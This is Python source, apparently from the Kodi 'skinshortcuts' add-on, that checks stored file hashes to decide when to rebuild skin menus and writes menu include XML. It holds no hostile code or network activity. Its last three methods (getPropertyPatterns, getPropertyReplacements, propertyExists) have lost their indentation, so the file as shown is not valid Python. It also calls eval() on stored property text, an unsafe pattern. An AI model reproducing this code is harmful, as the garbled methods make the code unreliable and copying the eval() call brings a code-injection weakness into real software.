            property = xbmcgui.Window( 10000 ).getProperty( "skinshortcuts-reloadmainmenu" )
            xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-reloadmainmenu" )
            if property == "True":
                log( "Menu has been edited")
                return True
        except:
            pass

        # Save some settings to skin strings
        xbmc.executebuiltin( "Skin.SetString(skinshortcuts-sharedmenu,%s)" %( __addon__.getSetting( "shared_menu" ) ) )

        # Get the skins addon.xml file
        addonpath = xbmc.translatePath( os.path.join( "special://skin/", 'addon.xml').encode("utf-8") ).decode("utf-8")
        addon = xmltree.parse( addonpath )
        extensionpoints = addon.findall( "extension" )
        paths = []
        skinpaths = []

        # Get the skin version
        skinVersion = addon.getroot().attrib.get( "version" )

        # Get the directories for resolutions this skin supports
        for extensionpoint in extensionpoints:
            if extensionpoint.attrib.get( "point" ) == "xbmc.gui.skin":
                resolutions = extensionpoint.findall( "res" )
                for resolution in resolutions:
                    path = xbmc.translatePath( os.path.join( "special://skin/", resolution.attrib.get( "folder" ), "script-skinshortcuts-includes.xml").encode("utf-8") ).decode("utf-8")
                    paths.append( path )
                    skinpaths.append( path )

        # Check for the includes file
        for path in paths:
            if not xbmcvfs.exists( path ):
                log( "Includes file does not exist" )
                return True
            else:
                pass

        try:
            hashes = ast.literal_eval( xbmcvfs.File( os.path.join( __masterpath__ , xbmc.getSkinDir() + ".hash" ) ).read() )
        except:
            # There is no hash list, return True
            log( "No hash list" )
            print_exc()
            return True

        checkedXBMCVer = False
        checkedSkinVer = False
        checkedScriptVer = False
        checkedProfileList = False
        checkedPVRVis = False
        checkedSharedMenu = False
        foundFullMenu = False

        for hash in hashes:
            if hash[1] is not None:
                if hash[0] == "::XBMCVER::":
                    # Check the Kodi version is still the same as hash[1]
                    checkedXBMCVer = True
                    if __xbmcversion__ != hash[1]:
                        log( "Now running a different version of Kodi" )
                        return True
                elif hash[0] == "::SKINVER::":
                    # Check the skin version is still the same as hash[1]
                    checkedSkinVer = True
                    if skinVersion != hash[1]:
                        log( "Now running a different skin version" )
                        return True
                elif hash[0] == "::SCRIPTVER::":
                    # Check the script version is still the same as hash[1]
                    checkedScriptVer = True
                    if __addonversion__ != hash[1]:
                        log( "Now running a different script version" )
                        return True
                elif hash[0] == "::PROFILELIST::":
                    # Check the profilelist is still the same as hash[1]
                    checkedProfileList = True
                    if profilelist != hash[1]:
                        log( "Profiles have changed" )
                        return True
                elif hash[0] == "::HIDEPVR::":
                    checkedPVRVis = True
                    if __addon__.getSetting( "donthidepvr" ) != hash[1]:
                        log( "PVR visibility setting has changed" )
                elif hash[0] == "::SHARED::":
                    # Check whether shared-menu setting has changed
                    checkedSharedMenu = True
                    if __addon__.getSetting( "shared_menu" ) != hash[1]:
                        log( "Shared menu setting has changed" )
                        return True
                elif hash[0] == "::LANGUAGE::":
                    # We no longer need to rebuild on a system language change
                    pass
                elif hash[0] == "::SKINBOOL::":
                    # A boolean we need to set (if profile matches)
                    if xbmc.getCondVisibility( hash[ 1 ][ 0 ] ):
                        if hash[ 1 ][ 2 ] == "True":
                            xbmc.executebuiltin( "Skin.SetBool(%s)" %( hash[ 1 ][ 1 ] ) )
                        else:
                            xbmc.executebuiltin( "Skin.Reset(%s)" %( hash[ 1 ][ 1 ] ) )
                elif hash[0] == "::FULLMENU::":
                    # Mark that we need to set the fullmenu bool
                    foundFullMenu = True
                elif hash[0] == "::SKINDIR::":
                    # Used to import menus from one skin to another, nothing to check here
                    pass
                else:
                    try:
                        hasher = hashlib.md5()
                        hasher.update( xbmcvfs.File( hash[0] ).read() )
                        if hasher.hexdigest() != hash[1]:
                            log( "Hash does not match on file " + hash[0] )
                            log( "(" + hash[1] + " > " + hasher.hexdigest() + ")" )
                            return True
                    except:
                        log( "Unable to generate hash for %s" %( hash[ 0 ] ) )
                        log( "(%s > ?)" %( hash[ 1 ] ) )
            else:
                if xbmcvfs.exists( hash[0] ):
                    log( "File now exists " + hash[0] )
                    return True

        # Set or clear the FullMenu skin bool
        if foundFullMenu:
            xbmc.executebuiltin( "Skin.SetBool(SkinShortcuts-FullMenu)" )
        else:
            xbmc.executebuiltin( "Skin.Reset(SkinShortcuts-FullMenu)" )

        # If the skin or script version, or profile list, haven't been checked, we need to rebuild the menu
        # (most likely we're running an old version of the script)
        if checkedXBMCVer == False or checkedSkinVer == False or checkedScriptVer == False or checkedProfileList == False or checkedPVRVis == False or checkedSharedMenu == False:
            return True

        # If we get here, the menu does not need to be rebuilt.
        return False
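
    # Illustrative shape of the persisted <skindir>.hash list that
    # shouldwerun() consumes (values are examples only; the real file is
    # written at the end of writexml() below):
    #
    #     [["::PROFILELIST::", [...]], ["::SCRIPTVER::", "1.0.0"],
    #      ["::XBMCVER::", "16"], ["::FULLMENU::", "True"],
    #      ["/path/to/overrides.xml", "d41d8cd98f00b204e9800998ecf8427e"]]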
    def writexml( self, profilelist, mainmenuID, groups, numLevels, buildMode, progress, options, minitems ):
        # Reset the hashlist, add the profile list and script version
        hashlist.list = []
        hashlist.list.append( ["::PROFILELIST::", profilelist] )
        hashlist.list.append( ["::SCRIPTVER::", __addonversion__] )
        hashlist.list.append( ["::XBMCVER::", __xbmcversion__] )
        hashlist.list.append( ["::HIDEPVR::", __addon__.getSetting( "donthidepvr" )] )
        hashlist.list.append( ["::SHARED::", __addon__.getSetting( "shared_menu" )] )
        hashlist.list.append( ["::SKINDIR::", xbmc.getSkinDir()] )

        # Clear any skin settings for backgrounds and widgets
        DATA._reset_backgroundandwidgets()
        self.widgetCount = 1

        # Create a new tree and includes for the various groups
        tree = xmltree.ElementTree( xmltree.Element( "includes" ) )
        root = tree.getroot()

        # Create a Template object and pass it the root
        Template = template.Template()
        Template.includes = root
        Template.progress = progress

        # Get any shortcuts we're checking for
        self.checkForShortcuts = []
        overridestree = DATA._get_overrides_skin()
        checkForShortcutsOverrides = overridestree.getroot().findall( "checkforshortcut" )
        for checkForShortcutOverride in checkForShortcutsOverrides:
            if "property" in checkForShortcutOverride.attrib:
                # Add this to the list of shortcuts we'll check for
                self.checkForShortcuts.append( ( checkForShortcutOverride.text.lower(), checkForShortcutOverride.attrib.get( "property" ), "False" ) )

        mainmenuTree = xmltree.SubElement( root, "include" )
        mainmenuTree.set( "name", "skinshortcuts-mainmenu" )

        submenuTrees = []
        for level in range( 0, int( numLevels) + 1 ):
            subelement = xmltree.SubElement(root, "include")
            subtree = xmltree.SubElement( root, "include" )
            if level == 0:
                subtree.set( "name", "skinshortcuts-submenu" )
            else:
                subtree.set( "name", "skinshortcuts-submenu-" + str( level ) )
            if not subtree in submenuTrees:
                submenuTrees.append( subtree )

        if buildMode == "single":
            allmenuTree = xmltree.SubElement( root, "include" )
            allmenuTree.set( "name", "skinshortcuts-allmenus" )

        profilePercent = 100 / len( profilelist )
        profileCount = -1

        submenuNodes = {}

        for profile in profilelist:
            log( "Building menu for profile %s" %( profile[ 2 ] ) )
            # Load profile details
            profileDir = profile[0]
            profileVis = profile[1]
            profileCount += 1

            # Reset whether we have settings
            self.hasSettings = False

            # Reset any checkForShortcuts to say we haven't found them
            newCheckForShortcuts = []
            for checkforShortcut in self.checkForShortcuts:
                newCheckForShortcuts.append( ( checkforShortcut[ 0 ], checkforShortcut[ 1 ], "False" ) )
            self.checkForShortcuts = newCheckForShortcuts

            # Clear any previous labelID's
            DATA._clear_labelID()

            # Clear any additional properties, which may be for a different profile
            DATA.currentProperties = None

            # Create objects to hold the items
            menuitems = []
            templateMainMenuItems = xmltree.Element( "includes" )

            # If building the main menu, split the mainmenu shortcut nodes into the menuitems list
            fullMenu = False
            if groups == "" or groups.split( "|" )[0] == "mainmenu":
                # Set a skinstring that marks that we're providing the whole menu
                xbmc.executebuiltin( "Skin.SetBool(SkinShortcuts-FullMenu)" )
                hashlist.list.append( ["::FULLMENU::", "True"] )
                for node in DATA._get_shortcuts( "mainmenu", None, True, profile[0] ).findall( "shortcut" ):
                    menuitems.append( node )
                fullMenu = True
            else:
                # Clear any skinstring marking that we're providing the whole menu
                xbmc.executebuiltin( "Skin.Reset(SkinShortcuts-FullMenu)" )
                hashlist.list.append( ["::FULLMENU::", "False"] )

            # If building specific groups, split them into the menuitems list
            count = 0
            if groups != "":
                for group in groups.split( "|" ):
                    if count != 0 or group != "mainmenu":
                        menuitems.append( group )

            if len( menuitems ) == 0:
                # No groups to build
                break

            itemidmainmenu = 0
            if len( Template.otherTemplates ) == 0:
                percent = profilePercent / len( menuitems )
            else:
                percent = float( profilePercent ) / float( len( menuitems ) * 2 )
            Template.percent = percent * ( len( menuitems ) )

            i = 0
            for item in menuitems:
                i += 1
                itemidmainmenu += 1
                currentProgress = ( profilePercent * profileCount ) + ( percent * i )
                progress.update( int( currentProgress ) )
                Template.current = currentProgress
                submenuDefaultID = None

                if not isinstance( item, basestring ):
                    # This is a main menu item (we know this because it's an element, not a string)
                    submenu = item.find( "labelID" ).text

                    # Build the menu item
                    menuitem, allProps = self.buildElement( item, "mainmenu", None, profile[1], DATA.slugify( submenu, convertInteger=True ), itemid = itemidmainmenu, options = options )

                    # Save a copy for the template
                    templateMainMenuItems.append( Template.copy_tree( menuitem ) )

                    # Get submenu defaultID
                    submenuDefaultID = item.find( "defaultID" ).text

                    # Remove any template-only properties
                    otherProperties, requires, templateOnly = DATA._getPropertyRequires()
                    for key in otherProperties:
                        if key in allProps.keys() and key in templateOnly:
                            # This key is template-only
                            menuitem.remove( allProps[ key ] )
                            allProps.pop( key )

                    # Add the menu item to the various includes, retaining a reference to them
                    mainmenuItemA = Template.copy_tree( menuitem )
                    mainmenuTree.append( mainmenuItemA )

                    if buildMode == "single":
                        mainmenuItemB = Template.copy_tree( menuitem )
                        allmenuTree.append( mainmenuItemB )
                else:
                    # It's an additional menu, so get its labelID
                    submenu = DATA._get_labelID( item, None )

                # Build the submenu
                count = 0  # Used to keep track of additional submenu
                for submenuTree in submenuTrees:
                    submenuVisibilityName = submenu
                    if count == 1:
                        submenu = submenu + "." + str( count )
                    elif count != 0:
                        submenu = submenu[:-1] + str( count )
                        submenuVisibilityName = submenu[:-2]

                    # Get the trees we're going to write the menu to
                    if submenu in submenuNodes:
                        justmenuTreeA = submenuNodes[ submenu ][ 0 ]
                        justmenuTreeB = submenuNodes[ submenu ][ 1 ]
                    else:
                        # Create these nodes
                        justmenuTreeA = xmltree.SubElement( root, "include" )
                        justmenuTreeB = xmltree.SubElement( root, "include" )

                        justmenuTreeA.set( "name", "skinshortcuts-group-" + DATA.slugify( submenu ) )
                        justmenuTreeB.set( "name", "skinshortcuts-group-alt-" + DATA.slugify( submenu ) )

                        submenuNodes[ submenu ] = [ justmenuTreeA, justmenuTreeB ]

                    itemidsubmenu = 0

                    # Get the shortcuts for the submenu
                    if count == 0:
                        submenudata = DATA._get_shortcuts( submenu, submenuDefaultID, True, profile[0] )
                    else:
                        submenudata = DATA._get_shortcuts( submenu, None, True, profile[0] )

                    if type( submenudata ) == list:
                        submenuitems = submenudata
                    else:
                        submenuitems = submenudata.findall( "shortcut" )

                    # Are there any submenu items for the main menu?
                    if count == 0:
                        if len( submenuitems ) != 0:
                            try:
                                hasSubMenu = xmltree.SubElement( mainmenuItemA, "property" )
                                hasSubMenu.set( "name", "hasSubmenu" )
                                hasSubMenu.text = "True"
                                if buildMode == "single":
                                    hasSubMenu = xmltree.SubElement( mainmenuItemB, "property" )
                                    hasSubMenu.set( "name", "hasSubmenu" )
                                    hasSubMenu.text = "True"
                            except:
                                # There probably isn't a main menu
                                pass
                        else:
                            try:
                                hasSubMenu = xmltree.SubElement( mainmenuItemA, "property" )
                                hasSubMenu.set( "name", "hasSubmenu" )
                                hasSubMenu.text = "False"
                                if buildMode == "single":
                                    hasSubMenu = xmltree.SubElement( mainmenuItemB, "property" )
                                    hasSubMenu.set( "name", "hasSubmenu" )
                                    hasSubMenu.text = "False"
                            except:
                                # There probably isn't a main menu
                                pass

                    # If we're building a single menu, update the onclicks of the main menu
                    if buildMode == "single" and not len( submenuitems ) == 0:
                        for onclickelement in mainmenuItemB.findall( "onclick" ):
                            if "condition" in onclickelement.attrib:
                                onclickelement.set( "condition", "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ") + [" + onclickelement.attrib.get( "condition" ) + "]" )
                                newonclick = xmltree.SubElement( mainmenuItemB, "onclick" )
                                newonclick.text = "SetProperty(submenuVisibility," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ",10000)"
                                newonclick.set( "condition", onclickelement.attrib.get( "condition" ) )
                            else:
                                onclickelement.set( "condition", "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
                                newonclick = xmltree.SubElement( mainmenuItemB, "onclick" )
                                newonclick.text = "SetProperty(submenuVisibility," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ",10000)"

                    # Build the submenu items
                    templateSubMenuItems = xmltree.Element( "includes" )
                    for submenuItem in submenuitems:
                        itemidsubmenu += 1
                        # Build the item without any visibility conditions
                        menuitem, allProps = self.buildElement( submenuItem, submenu, None, profile[1], itemid = itemidsubmenu, options = options )
                        isSubMenuElement = xmltree.SubElement( menuitem, "property" )
                        isSubMenuElement.set( "name", "isSubmenu" )
                        isSubMenuElement.text = "True"

                        # Save a copy for the template
                        templateSubMenuItems.append( Template.copy_tree( menuitem ) )

                        # Remove any template-only properties
                        otherProperties, requires, templateOnly = DATA._getPropertyRequires()
                        for key in otherProperties:
                            if key in allProps.keys() and key in templateOnly:
                                # This key is template-only
                                menuitem.remove( allProps[ key ] )
                                allProps.pop( key )

                        # Add it, with appropriate visibility conditions, to the various submenu includes
                        justmenuTreeA.append( menuitem )

                        menuitemCopy = Template.copy_tree( menuitem )
                        visibilityElement = menuitemCopy.find( "visible" )
                        visibilityElement.text = "[%s] + %s" %( visibilityElement.text, "StringCompare(Window(10000).Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
                        justmenuTreeB.append( menuitemCopy )

                        if buildMode == "single":
                            # Add the property 'submenuVisibility'
                            allmenuTreeCopy = Template.copy_tree( menuitemCopy )
                            submenuVisibility = xmltree.SubElement( allmenuTreeCopy, "property" )
                            submenuVisibility.set( "name", "submenuVisibility" )
                            submenuVisibility.text = DATA.slugify( submenuVisibilityName, convertInteger=True )

                            allmenuTree.append( allmenuTreeCopy )

                        menuitemCopy = Template.copy_tree( menuitem )
                        visibilityElement = menuitemCopy.find( "visible" )
                        visibilityElement.text = "[%s] + %s" %( visibilityElement.text, "StringCompare(Container(" + mainmenuID + ").ListItem.Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")" )
                        submenuTree.append( menuitemCopy )

                    # Build the template for the submenu
                    Template.parseItems( "submenu", count, templateSubMenuItems, profile[ 2 ], profile[ 1 ], "StringCompare(Container(" + mainmenuID + ").ListItem.Property(submenuVisibility)," + DATA.slugify( submenuVisibilityName, convertInteger=True ) + ")", item )

                    count += 1

            if self.hasSettings == False:
                # Check if the overrides asks for a forced settings...
                overridestree = DATA._get_overrides_skin()
                forceSettings = overridestree.getroot().find( "forcesettings" )
                if forceSettings is not None:
                    # We want a settings option to be added
                    newelement = xmltree.SubElement( mainmenuTree, "item" )
                    xmltree.SubElement( newelement, "label" ).text = "$LOCALIZE[10004]"
                    xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
                    xmltree.SubElement( newelement, "onclick" ).text = "ActivateWindow(settings)"
                    xmltree.SubElement( newelement, "visible" ).text = profile[1]

                    if buildMode == "single":
                        newelement = xmltree.SubElement( mainmenuTree, "item" )
                        xmltree.SubElement( newelement, "label" ).text = "$LOCALIZE[10004]"
                        xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
                        xmltree.SubElement( newelement, "onclick" ).text = "ActivateWindow(settings)"
                        xmltree.SubElement( newelement, "visible" ).text = profile[1]

            if len( self.checkForShortcuts ) != 0:
                # Add a value to the variable for all checkForShortcuts
                for checkForShortcut in self.checkForShortcuts:
                    if profile[ 1 ] is not None and xbmc.getCondVisibility( profile[ 1 ] ):
                        # Current profile - set the skin bool
                        if checkForShortcut[ 2 ] == "True":
                            xbmc.executebuiltin( "Skin.SetBool(%s)" %( checkForShortcut[ 1 ] ) )
                        else:
                            xbmc.executebuiltin( "Skin.Reset(%s)" %( checkForShortcut[ 1 ] ) )
                    # Save this to the hashes file, so we can set it on profile changes
                    hashlist.list.append( [ "::SKINBOOL::", [ profile[ 1 ], checkForShortcut[ 1 ], checkForShortcut[ 2 ] ] ] )

            # Build the template for the main menu
            Template.parseItems( "mainmenu", 0, templateMainMenuItems, profile[ 2 ], profile[ 1 ], "", "", mainmenuID )

            # If we haven't built enough main menu items, copy the ones we have
            while itemidmainmenu < minitems and fullMenu and len( mainmenuTree ) != 0:
                updatedMenuTree = Template.copy_tree( mainmenuTree )
                for item in updatedMenuTree:
                    itemidmainmenu += 1
                    # Update ID
                    item.set( "id", str( itemidmainmenu ) )
                    for idElement in item.findall( "property" ):
                        if idElement.attrib.get( "name" ) == "id":
                            idElement.text = "$NUM[%s]" %( str( itemidmainmenu ) )
                    mainmenuTree.append( item )

        # Build any 'Other' templates
        Template.writeOthers()

        progress.update( 100, message = __language__( 32098 ) )

        # Get the skins addon.xml file
        addonpath = xbmc.translatePath( os.path.join( "special://skin/", 'addon.xml').encode("utf-8") ).decode("utf-8")
        addon = xmltree.parse( addonpath )
        extensionpoints = addon.findall( "extension" )
        paths = []
        for extensionpoint in extensionpoints:
            if extensionpoint.attrib.get( "point" ) == "xbmc.gui.skin":
                resolutions = extensionpoint.findall( "res" )
                for resolution in resolutions:
                    path = xbmc.translatePath( os.path.join( try_decode( self.skinDir ) , try_decode( resolution.attrib.get( "folder" ) ), "script-skinshortcuts-includes.xml").encode("utf-8") ).decode('utf-8')
                    paths.append( path )
        skinVersion = addon.getroot().attrib.get( "version" )

        # Save the tree
        DATA.indent( tree.getroot() )
        for path in paths:
            tree.write( path, encoding="UTF-8" )
            # Save the hash of the file we've just written
            with open(path, "r+") as f:
                DATA._save_hash( path, f.read() )
                f.close()

        # Append the skin version to the hashlist
        hashlist.list.append( ["::SKINVER::", skinVersion] )

        # Save the hashes
        file = xbmcvfs.File( os.path.join( __masterpath__ , xbmc.getSkinDir() + ".hash" ), "w" )
        file.write( repr( hashlist.list ) )
        file.close()
    def buildElement( self, item, groupName, visibilityCondition, profileVisibility, submenuVisibility = None, itemid=-1, options=[] ):
        # This function will build an element for the passed Item in
        newelement = xmltree.Element( "item" )
        allProps = {}

        # Set ID
        if itemid is not -1:
            newelement.set( "id", str( itemid ) )
            idproperty = xmltree.SubElement( newelement, "property" )
            idproperty.set( "name", "id" )
            idproperty.text = "$NUM[%s]" %( str( itemid ) )
            allProps[ "id" ] = idproperty

        # Label and label2
        xmltree.SubElement( newelement, "label" ).text = DATA.local( item.find( "label" ).text )[1]
        xmltree.SubElement( newelement, "label2" ).text = DATA.local( item.find( "label2" ).text )[1]

        # Icon and thumb
        icon = item.find( "override-icon" )
        if icon is None:
            icon = item.find( "icon" )
        if icon is None:
            xmltree.SubElement( newelement, "icon" ).text = "DefaultShortcut.png"
        else:
            xmltree.SubElement( newelement, "icon" ).text = try_decode( icon.text )
        thumb = item.find( "thumb" )
        if thumb is not None:
            xmltree.SubElement( newelement, "thumb" ).text = try_decode( item.find( "thumb" ).text )

        # labelID and defaultID
        labelID = xmltree.SubElement( newelement, "property" )
        labelID.text = item.find( "labelID" ).text
        labelID.set( "name", "labelID" )
        allProps[ "labelID" ] = labelID
        defaultID = xmltree.SubElement( newelement, "property" )
        defaultID.text = item.find( "defaultID" ).text
        defaultID.set( "name", "defaultID" )
        allProps[ "defaultID" ] = defaultID

        # Clear cloned options if main menu
        if groupName == "mainmenu":
            self.MAINWIDGET = {}
            self.MAINBACKGROUND = {}
            self.MAINPROPERTIES = {}

        # Get fallback custom properties
        foundProperties = []

        # Additional properties
        properties = eval( item.find( "additional-properties" ).text )
        if len( properties ) != 0:
            for property in properties:
                if property[0] == "node.visible":
                    visibleProperty = xmltree.SubElement( newelement, "visible" )
                    visibleProperty.text = try_decode( property[1] )
                else:
                    additionalproperty = xmltree.SubElement( newelement, "property" )
                    additionalproperty.set( "name", property[0].decode( "utf-8" ) )
                    additionalproperty.text = property[1]
                    allProps[ property[ 0 ] ] = additionalproperty

                    # If this is a widget or background, set a skin setting to say it's enabled
                    if property[0] == "widget":
                        xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-widget-" + property[1] + ")" )
                        # And if it's the main menu, list it
                        if groupName == "mainmenu":
                            xbmc.executebuiltin( "Skin.SetString(skinshortcuts-widget-" + str( self.widgetCount ) + "," + property[ 1 ] + ")" )
                            self.widgetCount += 1
                    elif property[0] == "background":
                        try:
                            xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-background-" + property[1] + ")" )
                        except UnicodeEncodeError:
                            xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-background-" + property[1].encode('utf-8') + ")" )

                    # If this is the main menu, and we're cloning widgets, backgrounds or properties...
                    if groupName == "mainmenu":
                        if "clonewidgets" in options:
                            widgetProperties = [ "widget", "widgetName", "widgetType", "widgetTarget", "widgetPath", "widgetPlaylist" ]
                            if property[0] in widgetProperties:
                                self.MAINWIDGET[ property[0] ] = property[1]
                        if "clonebackgrounds" in options:
                            backgroundProperties = [ "background", "backgroundName", "backgroundPlaylist", "backgroundPlaylistName" ]
                            if property[0] in backgroundProperties:
                                self.MAINBACKGROUND[ property[0] ] = property[1]
                        if "cloneproperties" in options:
                            self.MAINPROPERTIES[ property[0] ] = property[1]

                    # For backwards compatibility, save widgetPlaylist as widgetPath too
                    if property[ 0 ] == "widgetPlaylist":
                        additionalproperty = xmltree.SubElement( newelement, "property" )
                        additionalproperty.set( "name", "widgetPath" )
                        additionalproperty.text = try_decode( property[1] )

        # Get fallback properties, property requirements, templateOnly value of properties
        fallbackProperties, fallbacks = DATA._getCustomPropertyFallbacks( groupName )

        # Add fallback properties
        for key in fallbackProperties:
            if key not in allProps.keys():
                # Check whether we have a fallback for the value
                for propertyMatch in fallbacks[ key ]:
                    matches = False
                    if propertyMatch[ 1 ] is None:
                        # This has no conditions, so it matched
                        matches = True
                    else:
                        # This has an attribute and a value to match against
                        for property in properties:
                            if property[ 0 ] == propertyMatch[ 1 ] and property[ 1 ] == propertyMatch[ 2 ]:
                                matches = True
                                break
                    if matches:
                        additionalproperty = xmltree.SubElement( newelement, "property" )
                        additionalproperty.set( "name", key.decode( "utf-8" ) )
                        additionalproperty.text = propertyMatch[ 0 ]
                        allProps[ key ] = additionalproperty
                        break

        # Get property requirements
        otherProperties, requires, templateOnly = DATA._getPropertyRequires()

        # Remove any properties whose requirements haven't been met
        for key in otherProperties:
            if key in allProps.keys() and key in requires.keys() and requires[ key ] not in allProps.keys():
                # This property's requirements aren't met
                newelement.remove( allProps[ key ] )
                allProps.pop( key )

        # Primary visibility
        visibility = item.find( "visibility" )
        if visibility is not None:
            xmltree.SubElement( newelement, "visible" ).text = visibility.text

        # Additional onclick (group overrides)
        onclicks = item.findall( "additional-action" )
        for onclick in onclicks:
            onclickelement = xmltree.SubElement( newelement, "onclick" )
            onclickelement.text = onclick.text
            if "condition" in onclick.attrib:
                onclickelement.set( "condition", onclick.attrib.get( "condition" ) )

        # Onclick
        onclicks = item.findall( "override-action" )
        if len( onclicks ) == 0:
            onclicks = item.findall( "action" )

        for onclick in onclicks:
            onclickelement = xmltree.SubElement( newelement, "onclick" )

            # Upgrade action if necessary
            onclick.text = DATA.upgradeAction( onclick.text )

            # PVR Action
            if onclick.text.startswith( "pvr-channel://" ):
                # PVR action
                onclickelement.text = "RunScript(script.skinshortcuts,type=launchpvr&channel=" + onclick.text.replace( "pvr-channel://", "" ) + ")"
            elif onclick.text.startswith( "ActivateWindow(" ) and xbmc.translatePath( "special://skin/" ) in onclick.text:
                # Skin-relative links
                try:
                    actionParts = onclick.text[15:-1].split( "," )
                    actionParts[1] = actionParts[1].replace( xbmc.translatePath( "special://skin/" ), "" )
                    path = actionParts[1].split( os.sep )
                    newAction = "special://skin"
                    for actionPart in actionParts[1].split( os.sep ):
                        if actionPart != "":
                            newAction = newAction + "/" + actionPart
                    if len( actionParts ) == 2:
                        onclickelement.text = "ActivateWindow(" + actionParts[0] + "," + newAction + ")"
                    else:
                        onclickelement.text = "ActivateWindow(" + actionParts[0] + "," + newAction + "," + actionParts[2] + ")"
                except:
                    pass
            else:
                onclickelement.text = onclick.text

            # Also add it as a path property
            if not self.propertyExists( "path", newelement ) and not "path" in allProps.keys():
                # we only add the path property if there isn't already one in the list because it has to be unique in Kodi lists
                pathelement = xmltree.SubElement( newelement, "property" )
                pathelement.set( "name", "path" )
                pathelement.text = onclickelement.text
                allProps[ "path" ] = pathelement

            # Get 'list' property (the action property of an ActivateWindow shortcut)
            if not self.propertyExists( "list", newelement ) and not "list" in allProps.keys():
                # we only add the list property if there isn't already one in the list because it has to be unique in Kodi lists
                listElement = xmltree.SubElement( newelement, "property" )
                listElement.set( "name", "list" )
                listElement.text = DATA.getListProperty( onclickelement.text.replace('"','') )
                allProps[ "list" ] = listElement

            if onclick.text == "ActivateWindow(Settings)":
                self.hasSettings = True

            if "condition" in onclick.attrib:
                onclickelement.set( "condition", onclick.attrib.get( "condition" ) )

            if len( self.checkForShortcuts ) != 0:
                # Check if we've been asked to watch for this shortcut
                newCheckForShortcuts = []
                for checkforShortcut in self.checkForShortcuts:
                    if onclick.text.lower() == checkforShortcut[ 0 ]:
                        # They match, change the value to True
                        newCheckForShortcuts.append( ( checkforShortcut[ 0 ], checkforShortcut[ 1 ], "True" ) )
                    else:
                        newCheckForShortcuts.append( checkforShortcut )
                self.checkForShortcuts = newCheckForShortcuts

        # Visibility
        if visibilityCondition is not None:
            visibilityElement = xmltree.SubElement( newelement, "visible" )
            if profileVisibility is not None:
                visibilityElement.text = profileVisibility + " + [" + visibilityCondition + "]"
            else:
                visibilityElement.text = visibilityCondition
            issubmenuElement = xmltree.SubElement( newelement, "property" )
            issubmenuElement.set( "name", "isSubmenu" )
            issubmenuElement.text = "True"
            allProps[ "isSubmenu" ] = issubmenuElement
        elif profileVisibility is not None:
            visibilityElement = xmltree.SubElement( newelement, "visible" )
            visibilityElement.text = profileVisibility

        # Submenu visibility
        if submenuVisibility is not None:
            submenuVisibilityElement = xmltree.SubElement( newelement, "property" )
            submenuVisibilityElement.set( "name", "submenuVisibility" )
            if submenuVisibility.isdigit():
                submenuVisibilityElement.text = "$NUMBER[" + submenuVisibility + "]"
            else:
                submenuVisibilityElement.text = DATA.slugify( submenuVisibility )

        # Group name
        group = xmltree.SubElement( newelement, "property" )
        group.set( "name", "group" )
        group.text = try_decode( groupName )
        allProps[ "group" ] = group

        # If this isn't the main menu, and we're cloning widgets or backgrounds...
        if groupName != "mainmenu":
            if "clonewidgets" in options and len( self.MAINWIDGET ) is not 0:
                for key in self.MAINWIDGET:
                    additionalproperty = xmltree.SubElement( newelement, "property" )
                    additionalproperty.set( "name", key )
                    additionalproperty.text = try_decode( self.MAINWIDGET[ key ] )
                    allProps[ key ] = additionalproperty
            if "clonebackgrounds" in options and len( self.MAINBACKGROUND ) is not 0:
                for key in self.MAINBACKGROUND:
                    additionalproperty = xmltree.SubElement( newelement, "property" )
                    additionalproperty.set( "name", key )
                    additionalproperty.text = DATA.local( self.MAINBACKGROUND[ key ] )[1]
                    allProps[ key ] = additionalproperty
            if "cloneproperties" in options and len( self.MAINPROPERTIES ) is not 0:
                for key in self.MAINPROPERTIES:
                    additionalproperty = xmltree.SubElement( newelement, "property" )
                    additionalproperty.set( "name", key )
                    additionalproperty.text = DATA.local( self.MAINPROPERTIES[ key ] )[1]
                    allProps[ key ] = additionalproperty

        propertyPatterns = self.getPropertyPatterns(labelID.text, groupName)
        if len(propertyPatterns) > 0:
            propertyReplacements = self.getPropertyReplacements(newelement)
            for propertyName in propertyPatterns:
                propertyPattern = propertyPatterns[propertyName][0]
                for original, replacement in propertyReplacements:
                    regexpPattern = re.compile(re.escape(original), re.IGNORECASE)
                    propertyPattern = regexpPattern.sub(replacement, propertyPattern)
                additionalproperty = xmltree.SubElement(newelement, "property")
                additionalproperty.set("name", propertyName.decode("utf-8"))
                additionalproperty.text = propertyPattern.decode("utf-8")
                allProps[ propertyName ] = additionalproperty

        return( newelement, allProps )
def getPropertyPatterns(self, labelID, group):
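        # Collect <propertypattern property="..." group="..." [labelID="..."]>
        # elements from the skin's overrides file. A pattern scoped to this
        # item's labelID takes precedence over a group-wide one; the boolean
        # stored beside each pattern records whether it was labelID-specific.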
propertyPatterns = {}
if not self.loadedPropertyPatterns:
overrides = DATA._get_overrides_skin()
self.propertyPatterns = overrides.getroot().findall("propertypattern")
self.loadedPropertyPatterns = True
for propertyPatternElement in self.propertyPatterns:
propertyName = propertyPatternElement.get("property")
propertyGroup = propertyPatternElement.get("group")
if not propertyName or not propertyGroup or propertyGroup != group or not propertyPatternElement.text:
continue
propertyLabelID = propertyPatternElement.get("labelID")
if not propertyLabelID:
if propertyName not in propertyPatterns:
propertyPatterns[propertyName] = [propertyPatternElement.text, False]
elif propertyLabelID == labelID:
if propertyName not in propertyPatterns or propertyPatterns[propertyName][1] == False:
propertyPatterns[propertyName] = [propertyPatternElement.text, True]
return propertyPatterns
def getPropertyReplacements(self, element):
propertyReplacements = []
for subElement in list(element):
if subElement.tag == "property":
propertyName = subElement.get("name")
if propertyName and subElement.text:
propertyReplacements.append(("::%s::" % propertyName, subElement.text))
elif subElement.text:
propertyReplacements.append(("::%s::" % subElement.tag, subElement.text))
return propertyReplacements
def propertyExists( self, propertyName, element ):
for item in element.findall( "property" ):
if propertyName in item.attrib:
return True
